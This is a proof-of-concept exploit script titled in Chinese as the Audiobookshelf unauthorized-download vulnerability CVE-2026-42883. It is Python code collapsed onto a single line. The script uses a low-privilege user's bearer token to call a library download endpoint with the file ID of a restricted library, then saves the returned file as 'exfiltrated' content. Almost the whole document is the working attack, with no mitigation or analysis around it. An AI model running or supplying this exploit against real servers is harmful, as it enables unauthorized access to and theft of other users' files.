CVE-2026-42883 Audiobookshelf 越权下载漏洞

import requests # Target configuration target_host = "http://localhost:13378" # Attacker's credentials (Low privilege user with access to Library A) auth_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..." # Headers headers = { "Authorization": f"Bearer {auth_token}", "Content-Type": "application/json" } # Scenario: Attacker has access to Library ID 'lib_01', but wants to download a file from restricted Library 'lib_02' # The endpoint checks access to 'lib_01' but downloads file by its direct ID. # The ID of the library the attacker has access to accessible_library_id = "lib_01" # The ID of the target file belonging to a restricted library (Obtained via enumeration or guessing) target_file_id = "file_secret_id_in_lib_02" # Construct the malicious URL # The server checks access to 'accessible_library_id', then fetches 'target_file_id' exploit_url = f"{target_host}/api/libraries/{accessible_library_id}/download" payload = { "id": target_file_id, # The vulnerable parameter "type": "book" } print(f"[+] Attempting to download file {target_file_id} using library {accessible_library_id} as a pivot...") try: response = requests.get(exploit_url, headers=headers, params=payload, stream=True) if response.status_code == 200: print("[+] Exploit successful! File content received.") filename = f"exfiltrated_{target_file_id}.m4b" with open(filename, "wb") as f: for chunk in response.iter_content(chunk_size=8192): f.write(chunk) print(f"[+] File saved as {filename}") else: print(f"[-] Exploit failed. Status code: {response.status_code}") print(response.text) except Exception as e: print(f"[-] An error occurred: {e}")